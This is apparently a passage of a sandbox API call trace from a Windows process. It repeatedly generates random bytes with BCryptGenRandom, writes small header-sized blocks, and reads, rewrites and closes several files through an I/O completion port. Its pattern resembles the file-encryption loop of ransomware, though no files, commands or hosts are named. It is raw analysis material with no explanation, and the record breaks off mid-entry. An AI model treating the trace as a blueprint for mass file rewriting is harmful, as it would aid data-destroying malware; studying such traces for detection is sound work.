0x0 [0159.404] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0159.405] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0159.405] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0159.405] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0159.405] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0159.405] free (_Block=0x3e305b8) [0159.405] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0159.405] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0159.406] free (_Block=0x1fa91d0) [0159.406] free (_Block=0x1fa2ed8) [0159.406] free (_Block=0x1fa90b8) [0159.406] WriteFile (in: hFile=0x2a8, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0159.406] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0159.418] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0159.419] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0159.419] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0159.419] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0159.419] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0159.419] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0159.420] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0159.420] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0159.420] free (_Block=0x3e305b8) [0159.420] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0159.420] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0159.420] free (_Block=0x1fa91d0) [0159.420] free (_Block=0x1fa2ed8) [0159.420] free (_Block=0x1fa90b8) [0159.420] WriteFile (in: hFile=0x308, lpBuffer=0x3d70484, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 0x0 [0159.421] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0159.429] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0159.430] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0159.430] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0159.430] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0159.430] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0159.430] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0159.430] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0159.430] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0159.430] free (_Block=0x3e305b8) [0159.431] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0159.431] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0159.431] free (_Block=0x1fa91d0) [0159.431] free (_Block=0x1fa2ed8) [0159.431] free (_Block=0x1fa90b8) [0159.431] WriteFile (in: hFile=0x2a4, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0x61d, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0159.431] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0161.877] WriteFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x2ae0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0161.877] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0161.888] WriteFile (in: hFile=0x338, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x1950, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0161.889] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0161.892] WriteFile (in: hFile=0x3cc, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x38d0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0161.892] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0162.221] CloseHandle (hObject=0x308) returned 1 [0162.222] free (_Block=0x1ff1e60) [0162.222] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0162.229] WriteFile (in: hFile=0x2a8, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x2400, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0162.229] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0162.266] CloseHandle (hObject=0x2a4) returned 1 [0162.267] free (_Block=0x3df0008) [0162.267] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0162.270] CloseHandle (hObject=0x3cc) returned 1 [0162.270] free (_Block=0x3f70048) [0162.270] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0162.271] WriteFile (in: hFile=0x308, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x520, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0162.271] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0162.308] ReadFile (in: hFile=0x338, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x608, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0162.308] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0162.321] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xd58, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0162.321] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0162.379] CloseHandle (hObject=0x2a4) returned 1 [0162.379] free (_Block=0x3d70450) [0162.379] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0162.393] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x54b0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0162.393] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0162.397] WriteFile (in: hFile=0x338, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0x1a80, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0162.397] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0162.407] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.407] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.407] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0162.407] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.408] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.408] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0162.408] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0162.408] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0162.408] free (_Block=0x3e305b8) [0162.408] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0162.408] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0162.409] free (_Block=0x1fa91d0) [0162.409] free (_Block=0x1fa2ed8) [0162.409] free (_Block=0x1fa90b8) [0162.409] WriteFile (in: hFile=0x2a4, lpBuffer=0x3d70484, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 0x0 [0162.409] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0162.419] CloseHandle (hObject=0x3cc) returned 1 [0162.419] free (_Block=0x1ff1e60) [0162.419] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0162.422] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x16d8, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0162.423] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0162.423] CloseHandle (hObject=0x308) returned 1 [0162.423] free (_Block=0x3df0008) [0162.423] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0162.497] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.497] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.497] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0162.497] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.498] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.498] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0162.498] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0162.498] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0162.498] free (_Block=0x3e305b8) [0162.498] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0162.498] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0162.499] free (_Block=0x1fa91d0) [0162.499] free (_Block=0x1fa2ed8) [0162.499] free (_Block=0x1fa90b8) [0162.499] WriteFile (in: hFile=0x338, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0162.499] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0162.513] WriteFile (in: hFile=0x338, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0x1f40, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0162.514] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0162.526] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x1248, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0162.538] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0162.549] ReadFile (in: hFile=0x338, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x15b0, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 0x0 [0162.557] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0162.571] CloseHandle (hObject=0x338) returned 1 [0162.572] free (_Block=0x3d70450) [0162.572] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0162.595] CloseHandle (hObject=0x2a8) returned 1 [0162.595] free (_Block=0x3f70048) [0162.595] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0162.609] ReadFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x1694, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0162.622] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0162.639] CloseHandle (hObject=0x338) returned 1 [0162.639] free (_Block=0x3d70450) [0162.639] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0162.640] WriteFile (in: hFile=0x2a8, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0x70f0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0162.640] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0162.641] WriteFile (in: hFile=0x3cc, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x16b0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0162.641] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0162.732] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x4732, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0162.732] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0162.733] CloseHandle (hObject=0x308) returned 1 [0162.733] free (_Block=0x3df0008) [0162.733] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0162.745] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.746] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.746] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0162.746] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.746] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.746] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0162.747] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0162.747] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0162.747] free (_Block=0x3e305b8) [0162.747] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0162.747] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0162.747] free (_Block=0x1fa91d0) [0162.747] free (_Block=0x1fa2ed8) [0162.747] free (_Block=0x1fa90b8) [0162.747] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61a, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0162.748] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0162.759] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x6c00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0162.760] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0162.770] ReadFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0xd6e, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0162.770] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0162.774] ReadFile (in: hFile=0x2a8, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x1b74, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0162.784] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0162.791] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.791] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.792] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0162.792] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.792] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.792] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0162.792] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0162.792] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0162.792] free (_Block=0x3e305b8) [0162.792] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0162.792] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0162.793] free (_Block=0x1fa91d0) [0162.793] free (_Block=0x1fa2ed8) [0162.793] free (_Block=0x1fa90b8) [0162.793] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0162.793] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0162.799] WriteFile (in: hFile=0x338, lpBuffer=0x3f7007c, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c, 